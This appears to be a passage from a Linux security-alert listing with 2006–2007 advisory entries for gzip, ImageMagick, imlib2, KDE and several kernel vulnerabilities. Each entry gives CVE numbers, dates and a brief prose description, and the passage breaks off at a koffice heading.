| Package(s): | gzip |
| CVE #(s): | CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338 |
| Created: | September 19, 2006 |
| Updated: | June 1, 2007 |
| Description: | Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash. Tavis Ormandy of the Google Security Team also discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code. |
| Alerts: | |
Comments (1 posted)
gzip: arbitrary command execution
| Package(s): | gzip |
| CVE #(s): | CAN-2005-0758 |
| Created: | August 1, 2005 |
| Updated: | January 9, 2007 |
| Description: | zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|' and '&' properly when they occur in input file names. This could be exploited to execute arbitrary commands with user privileges if zgrep is run in an untrusted directory with specially crafted file names. |
| Alerts: | |
Comments (2 posted)
imagemagick: buffer overflows
| Package(s): | imagemagick |
| CVE #(s): | CVE-2006-5868 |
| Created: | November 28, 2006 |
| Updated: | February 16, 2007 |
| Description: | Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges. |
| Alerts: | |
Comments (1 posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
| CVE #(s): | CVE-2006-5456 |
| Created: | October 31, 2006 |
| Updated: | March 8, 2007 |
| Description: | Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c. |
| Alerts: | |
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
| CVE #(s): | CVE-2006-4806, CVE-2006-4807, CVE-2006-4808, CVE-2006-4809 |
| Created: | November 6, 2006 |
| Updated: | August 13, 2007 |
| Description: | M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. |
| Alerts: | |
Comments (none posted)
kdegraphics: stack overflow
| Package(s): | kdegraphics |
| CVE #(s): | CVE-2006-6297 |
| Created: | December 12, 2006 |
| Updated: | January 13, 2007 |
| Description: | A stack overflow in the KFILE JPEG (kfile_jpeg) plugin in kdegraphics3, as used by konqueror, digikam, and other KDE image browsers, allows remote attackers to cause a denial of service (stack consumption) via a crafted EXIF section in a JPEG file, which results in an infinite recursion. |
| Alerts: | |
Comments (none posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
| CVE #(s): | CVE-2006-4811 |
| Created: | October 18, 2006 |
| Updated: | March 5, 2007 |
| Description: | The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4623 |
| Created: | October 18, 2006 |
| Updated: | November 14, 2007 |
| Description: | The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: | |
Comments (none posted)
kernel: bridging code buffer overflow
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5751 |
| Created: | December 6, 2006 |
| Updated: | January 3, 2007 |
| Description: | A buffer overflow in the bridging code in kernels through 2.6.18.3 can lead to a denial of service or potential code execution. The 2.6.18.4 kernel contains the fix. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4535, CVE-2006-4538 |
| Created: | September 18, 2006 |
| Updated: | December 3, 2007 |
| Description: | Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535) Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538) |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4572, CVE-2006-4997 |
| Created: | November 6, 2006 |
| Updated: | January 17, 2007 |
| Description: | Some vulnerabilities were discovered in the Linux 2.6 kernel. There are possibly exploitable bugs in the netfilter for IPv6 code. (CVE-2006-4572) The ATM subsystem of the Linux kernel could allow a remote attacker to cause a Denial of Service (panic) via unknown vectors that cause the ATM subsystem to access the memory of socket buffers after they are freed. (CVE-2006-4997) |
| Alerts: | |
Comments (none posted)
kernel: denial of service by memory consumption
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2936 |
| Created: | July 17, 2006 |
| Updated: | November 14, 2007 |
| Description: | The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5757 |
| Created: | November 13, 2006 |
| Updated: | November 14, 2007 |
| Description: | From the MOKB-05-11-2006 advisory: "The ISO9660 filesystem handling code of the Linux 2.6.x kernel fails to properly handle corrupted data structures, leading to an exploitable denial of service condition. This particular vulnerability seems to be caused by a race condition and a signedness issue. When performing a read operation on a corrupted ISO9660 fs stream, the isofs_get_blocks() function will enter an infinite loop when __find_get_block_slow() callback from sb_getblk() fails ("due to various races between file io on the block device and getblk")." |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2935, CVE-2006-4145, CVE-2006-3745 |
| Created: | September 1, 2006 |
| Updated: | July 30, 2008 |
| Description: | Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause a system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack. |
| Alerts: | |
Comments (none posted)
koffice: integer overflow